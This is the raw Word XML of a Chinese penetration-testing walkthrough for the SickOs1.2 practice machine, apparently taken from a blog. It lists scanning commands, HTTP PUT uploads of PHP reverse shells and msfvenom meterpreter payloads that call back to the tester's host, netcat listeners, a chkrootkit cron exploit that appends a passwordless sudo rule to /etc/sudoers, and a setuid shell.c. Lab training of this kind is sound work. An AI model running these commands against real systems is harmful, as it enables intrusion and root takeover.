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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机SickOs1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t> 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"%E4%B8%80%E3%80%81%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83"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一、实验环境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"%E4%BA%8C%E3%80%81%E5%AE%9E%E9%AA%8C%E6%AD%A5%E9%AA%A4"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二、实验步骤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"%EF%BC%88%E4%B8%80%EF%BC%89%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"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（一）信息收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="22" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="22"/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"1.%E6%9F%A5%E7%9C%8B%E6%B5%8B%E8%AF%95%E6%9C%BA%E7%9A%84IP%E4%BF%A1%E6%81%AF%EF%BC%8C%E5%88%A4%E6%96%AD%E6%89%80%E5%A4%84%E7%BD%91%E6%AE%B5"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1.查看测试机的IP信息，判断所处网段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"2.%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0%EF%BC%88netdiscover%EF%BC%89"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2.主机发现（netdiscover）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"3.%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F%EF%BC%88masscan/nmap%EF%BC%89"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3.端口扫描（masscan/nmap）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"4.%E7%BD%91%E7%AB%99%E6%8C%87%E7%BA%B9%E4%BF%A1%E6%81%AF%E6%89%AB%E6%8F%8F%EF%BC%88whatweb%EF%BC%89"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4.网站指纹信息扫描（whatweb）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"%EF%BC%88%E4%BA%8C%EF%BC%89Web%E6%B8%97%E9%80%8F"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（二）Web渗透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"1.%E6%B5%8F%E8%A7%88web%E7%BD%91%E9%A1%B5%EF%BC%8880%E7%AB%AF%E5%8F%A3%EF%BC%89"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1.浏览web网页（80端口）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"2.%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95%EF%BC%8822%E7%AB%AF%E5%8F%A3%EF%BC%89"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2.远程登录（22端口）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"3.%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%EF%BC%88dirb%EF%BC%89"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3.目录扫描（dirb）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"%EF%BC%88%E4%B8%89%EF%BC%89%E8%8E%B7%E5%8F%96shell"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（三）获取shell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"1.%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9APUT%E6%96%B9%E6%B3%95+%E8%8F%9C%E5%88%80"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1.方法一：PUT方法+菜刀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"&gt;%E5%8F%A6%E4%B8%80%E7%A7%8D%E6%9F%A5%E7%9C%8B/test%E7%9B%AE%E5%BD%95%E6%94%AF%E6%8C%81%E6%96%B9%E6%B3%95%E7%9A%84%E6%96%B9%E5%BC%8F"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&gt;另一种查看/test目录支持方法的方式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"2.%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A%E4%B8%8A%E4%BC%A0%E5%8F%8D%E5%BC%B9shell%E8%84%9A%E6%9C%AC%E6%96%87%E4%BB%B6"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2.方法二：上传反弹shell脚本文件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"3.%E6%96%B9%E6%B3%95%E4%B8%89%EF%BC%9Amsfconsole%E5%B7%A5%E5%85%B7%E5%88%A9%E7%94%A8"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3.方法三：msfconsole工具利用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"%EF%BC%88%E5%9B%9B%EF%BC%89%E6%8F%90%E6%9D%83"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（四）提权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"1.%E6%9C%AC%E5%9C%B0%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0"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1.本地提权漏洞发现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"2.%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A%E5%B0%86%E5%BD%93%E5%89%8D%E7%94%A8%E6%88%B7%E5%8A%A0%E5%85%A5sudoers%E5%88%97%E8%A1%A8%E4%B8%AD"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2.方法一：将当前用户加入sudoers列表中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"3.%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9Ashell.c%E6%96%87%E4%BB%B6"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3.方法二：shell.c文件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"https://blog.csdn.net/qq_42180996/article/details/89917751" \l "%EF%BC%88%E4%BA%94%EF%BC%89%E9%98%B2%E7%81%AB%E5%A2%99%E8%A7%84%E5%88%99" \t "https://blog.csdn.net/qq_42180996/article/details/_self"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b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6795B5"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="13"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（五）防火墙规则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pict>
          <v:rect id="_x0000_i1025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bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="t1"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、实验环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>1.靶机：SickOs1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>2.测试机：Kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>3.帮凶机：Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>4.抓包工具：BurpSuite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="t2"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="t3"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（一）信息收集</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="t4"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.查看测试机的IP信息，判断所处网段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3124200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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bookmarkStart w:id="4" w:name="t5"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.主机发现（netdiscover）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>netdiscover -i eth0 -r 192.168.10.0/24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171700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51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发现目标主机：192.168.10.156</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="t6"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.端口扫描（masscan/nmap）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masscan --rate=10000 --ports 0-65535 192.168.10.156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nmap -sV -T4 -p 22,80 192.168.10.156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990850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="53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114550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="52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开启了22（ssh服务）、80（http服务）端口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="t7"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.网站指纹信息扫描（whatweb）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>whatweb 192.168.10.156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114425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54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bookmarkStart w:id="7" w:name="t8"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（二）Web渗透</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="t9"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.浏览web网页（80端口）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590800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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在网页及其源码中均未发现有用信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="t10"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.远程登录（22端口）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3543300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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使用弱口令root（root）尝试远程登录，竟然登录成功！！！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="t11"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.目录扫描（dirb）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>dirb http://192.168.10.156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086100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50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对扫描出来得路径进行访问，无法利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="t12"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（三）获取shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="t13"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.方法一：PUT方法+菜刀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>a.访问/test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http://192.168.10.156/test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searchsploit lighttpd 1.4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343025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13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676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23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访问该目录，发现该网站在lighttpd/1.4.28上运行，对其版本进行扫描，未发现可利用漏洞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b.查看/test目录支持的方法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cd /usr/share/nmap/scripts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cat http-methods.nse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nmap --script http-methods --script-args http-methods.url-path='/test' 192.168.10.156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628775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14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571500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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838450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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4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/test目录支持PUT方法，则可上传文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="t14"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;另一种查看/test目录支持方法的方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15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c.测试PUT方法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105025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24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362075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12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上传一个不存在的html文件进行测试（响应201 Created）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d.尝试上传木马文件，获取webshell权限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019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22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286250" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17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819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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bookmarkStart w:id="14" w:name="t15"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.方法二：上传反弹shell脚本文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>a.获取反弹shell脚本文件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cd /usr/share/webshells/php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cp /usr/share/webshells/php/php-reverse-shell.php /root/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leafpad php-reverse-shell.php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333625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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1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571625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10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2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b.上传脚本文件至靶机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>curl -v -H 'Expect:' -T php-reverse-shell.php "http://192.168.10.156/test/"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933700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20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514475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21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c.开启监听</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>nc -vnlp 443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914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9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5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d.触发脚本文件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543050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19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e.拿到shell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3086100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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7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bookmarkStart w:id="15" w:name="t16"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.方法三：msfconsole工具利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>a.msfvenom生成payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=7777 -f raw &gt; shell.php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304925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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此处运用了reverse_tcp，LHOST应为测试机的IP，进行了一个反转，变成测试机来进行监听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b.上传shell.py至靶机的/test/目录下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>curl -v -H 'Expect:' -T shell.php "http://192.168.10.156/test/"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952750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6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9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390650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25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0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在curl的参数中加上一个特定的HTTP Header Expect：，即将Header中Expect的值手动指定为空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c.启用msfconsole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root@xuer:~# msfconsole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&gt; use exploit/multi/handler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 xml:space="preserve">msf exploit(multi/handler) &gt; set payload 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 xml:space="preserve">msf exploit(multi/handler) &gt; show options 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exploit(multi/handler) &gt; set LHOST 192.168.10.156    #此处应set测试机IP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exploit(multi/handler) &gt; set LPORT 7777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exploit(multi/handler) &gt; exploit -j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exploit(multi/handler) &gt; sudo netstat -plnt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3333750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29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1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143125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16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2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此处的LHOST应与msfvenom生成payload命令中的相同（即测试机IP）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误设置成靶机IP，提示监听失败，转至0.0.0.0:7777监听（本机即测试机监听）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d.访问生成的shell.php文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>curl -v "http://192.168.10.156/test/shell.php"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000250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="图片 33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3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使用curl或BurpSuite访问这个生成的shell.php文件之后，页面卡顿（正常情况，在等待服务器响应），而msfconsole中并没有响应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猜测可能是防火墙ban掉了非常用端口的outbound流量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e.在msfvenom中修改监听端口，上传shell_443.php文件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msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f raw &gt; shell_443.php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curl -v -H 'Expect:' -T shell_443.php "http://192.168.10.156/test/"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4162425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18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4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466850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="图片 35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5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为防止防火墙ban掉非常用端口的outbound流量的现象，监听端口应设置为常用端口，如443端口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f.在msfconsole中修改修改监听端口（LHOST）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exploit(multi/handler) &gt; set LHOST 192.168.10.128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exploit(multi/handler) &gt; set LPORT 443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exploit(multi/handler) &gt; exploit -j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exploit(multi/handler) &gt; sudo netstat -plnt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228850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26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6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此时，监听反转设置成功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g.访问靶机上的shell_443.php文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>curl -v "http://192.168.10.156/test/shell_443.php"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581150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32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7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h.获取meterpreter的shell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msf exploit(multi/handler) &gt; sessions -i 1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python -c 'import pty; pty.spawn("/bin/bash")'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743075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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8" descr="IMG_2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552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8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9" descr="IMG_2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505075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11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0" descr="IMG_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访问shell_443.php文件后，即刻触发服务器端反弹TCP的操作，在msfconsole中会得到一个meterpreter的shell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使用python命令来spawn生成一个bash（即交互式tty）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="t17"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（四）提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="t18"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.本地提权漏洞发现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>a.查看靶机服务器版本信息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lsb_release -a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ls -la /etc/crontab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searchsploit chkrootkit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3590925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43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 descr="IMG_2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476250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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2" descr="IMG_2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crontab 是用来让使用者在固定时间或固定间隔执行程序之用，换句话说，也就是类似使用者的时程表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在/etc/cron.daily目录下，发现chkrootkit工具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b.Chkrootkit版本扫描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searchsploit chkrootkit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cat /usr/share/exploitdb/platforms/linux/local/38775.rb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609725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="44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 descr="IMG_29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600450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49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 descr="IMG_29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857375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="46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 descr="IMG_29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chkrootkit存在本地提权漏洞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原理：chkrootkit有crontab，会定期以root身份执行/tmp/update文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="t19"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.方法一：将当前用户加入sudoers列表中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>a.新建一个update文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>touch /tmp/update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562100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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6" descr="IMG_30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b.给update文件添加执行权限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chmod +x /tmp/update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ls -l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962275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42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7" descr="IMG_30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c.给update文件赋权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echo 'chmod +w /etc/sudoers &amp;&amp; echo "www-data ALL=(ALL)NOPASSWD:ALL" &gt;&gt; /etc/sudoers' &gt; /tmp/update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ls -la /etc/sudoers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123950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="48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30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d.提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>sudo su -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057775" cy="2266950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36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9" descr="IMG_30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使用sudo su命令提权时，只切换到root用户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使用sudo su -命令提权时，该命令将root的环境变量一起切换过来，相当于root登录时的状态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="t20"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.方法二：shell.c文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>a.在测试机编写shell.c文件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cd /var/www/html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 xml:space="preserve">leafpad shell.c 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 xml:space="preserve"> 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#include&lt;unistd.h&gt;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void main(void)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{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system("chown root:root /tmp/update");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system("chmod 4755 /tmp/update");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setuid(0);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setgid(0);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execl("/bin/sh","sh",NULL);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}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 xml:space="preserve"> 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/etc/init.d/apache2 start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638425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41" name="图片 50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0" descr="IMG_30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b.靶机获取shell.c文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>curl -v -H 'Expect:' -T shell.c "http://192.168.10.156/test/"</w:t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3162300"/>
